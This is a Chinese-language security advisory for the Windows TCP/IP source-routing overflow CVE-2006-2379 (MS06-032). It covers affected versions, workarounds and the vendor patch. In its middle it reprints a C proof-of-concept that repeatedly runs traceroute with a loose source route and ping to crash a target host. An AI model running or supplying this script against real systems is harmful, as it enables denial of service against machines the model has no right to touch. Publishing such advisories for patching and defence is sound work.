发布日期：2006-06-13
更新日期：2006-07-03

受影响系统：

Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000

描述：

---

BUGTRAQ  ID: 18374
CVE(CAN) ID: CVE-2006-2379

Microsoft Windows是微软发布的非常流行的操作系统。

Microsoft Windows的TCP/IP协议驱动处理特定畸形的IP源路由报文时存在缓冲区溢出漏洞，远程攻击者可以通过发送有Loose Source and Record Route选项的特制ICMP报文触发这个漏洞，导致tcpip.sys或ntoskrnl.exe中出现错误而造成拒绝服务或执行任意指令。

默认情况下，Windows系统的路由及远程访问服务是关闭的，也就是说默认情况下系统不受此漏洞影响。

<*来源：Andrey Minaev （angel3000@hotbox.ru）
  
  链接：http://secunia.com/advisories/20639/print/
        http://www.microsoft.com/technet/security/Bulletin/MS06-032.mspx
        http://www.us-cert.gov/cas/techalerts/TA06-164A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*

####################################
#
# Windows TCP/IP source routing poc
# C version...
#
# by Preddy
#
# RootShell Security Group
#
# Shoutz 2:
#
#  Jimmy and ByteCoder +
#  Rs Crew +
#  Rest of the world :D
#
#
####################################

Compile:

gcc win-tcpip-dos.c -o wintcpipdos

Info:

Published:     14.06.2006
Source:        ANDREYMINAEV
Type:          remote
Level:         9/10

Buffer overflow on ICMP packets with
Loose Source and Record Route IP options.
Short message translation: There are DoS
conditions in Windows 2000 built-in NAT
server. Tested configuration: Windows 2000
English Standard/Advanced Service Pack 4
+ Update Rollup 1 for Service Pack 4 with
NAT server enabled. While routing packets
with options "Loose Source and Record Route"
defined by RFC 791 through server, Windows
crashes to BSOD with error in tcpip.sys or
ntoskrnl.exe, or system hangs or system
began instable work. It doesn't metter if
packets are from internal or external
networks. Use attached script to test
vulnerability. On Windows 2003 problem
doesn't present. It's also likely same
problem to present in Windows 2000 +
ISA 2000. Code execution is potentially possible.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


main(int argc, char *argv[])
{

char dos_ip[255];
char mysystem[10];
char ping[20+1];
char trace[100];


if(argc != 3)
{

printf("\n\nWindows TCP/IP source routing Dos - by Preddy\n");
printf("Usage: %s <ip> <mysystem>\n", argv[0]);
printf("Example: %s 127.0.0.1 linux\n", argv[0]);
printf("Uses the ping and the traceroute utility on your system\n", argv[0]);
printf("Should cause a BSOD on the remote system\n");
printf("More info: http://www.security.nnov.ru/Fnews753.html\n\n");
exit(1);
}

strcpy(dos_ip, argv[1]);
strcpy(mysystem, argv[2]);


if((strcmp (argv[2],"linux"))==0)
{

printf("\nTarget: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n\n");


strcpy(ping, "ping -c 1 ");
strncat(ping,argv[1],9);

strcpy(trace, "traceroute -m 1 -g 0.0.0.0 ");
strncat(trace,argv[1],9);


while(1)
{
system(trace);
system(ping);
}

}

if((strcmp (argv[2],"windows"))==0)
{

printf("Target: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n");


strcpy(ping, "ping -n 1 ");
strncat(ping,argv[1],9);

strcpy(trace, "tracert -h 1 -j 0.0.0.0 ");
strncat(trace,argv[1],9);


while(1)
{
system(trace);
system(ping);
}

}

}

建议：

---

临时解决方法：

* 在防火墙阻断包含有IP源路由选项131和137的IP报文。
* 使用个人防火墙，如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。
* 禁用IP源路由。
* 在受影响的系统上使用IPSec阻断受影响的端口。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-032）以及相应补丁:
MS06-032：Vulnerability in TCP/IP Could Allow Remote Code Execution (917953)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-032.mspx

浏览次数：5223
严重程度：0（网友投票）